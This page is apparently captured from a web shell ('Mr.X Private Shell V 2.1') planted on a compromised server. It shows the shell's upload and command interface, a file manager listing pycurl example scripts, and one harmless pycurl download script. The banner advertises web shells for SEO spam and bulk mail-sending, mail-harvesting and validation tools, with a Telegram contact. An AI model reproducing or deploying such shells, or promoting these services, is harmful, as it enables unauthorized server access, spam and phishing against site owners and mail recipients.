__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

aptanhua@216.73.216.7: ~ $
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vi:ts=4:et

import pycurl

# As long as the file is opened in binary mode, both Python 2 and Python 3
# can write response body to it without decoding.
with open('out.html', 'wb') as f:
    c = pycurl.Curl()
    c.setopt(c.URL, 'http://pycurl.io/')
    c.setopt(c.WRITEDATA, f)
    c.perform()
    c.close()

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
file_upload_buffer.py File 311 B 0644
file_upload_real.py File 291 B 0644
file_upload_real_fancy.py File 483 B 0644
follow_redirect.py File 250 B 0644
form_post.py File 564 B 0644
get.py File 583 B 0644
get_python2.py File 447 B 0644
get_python2_https.py File 498 B 0644
get_python3.py File 403 B 0644
get_python3_https.py File 454 B 0644
put_buffer.py File 472 B 0644
put_file.py File 300 B 0644
response_headers.py File 2.05 KB 0644
response_info.py File 498 B 0644
write_file.py File 357 B 0644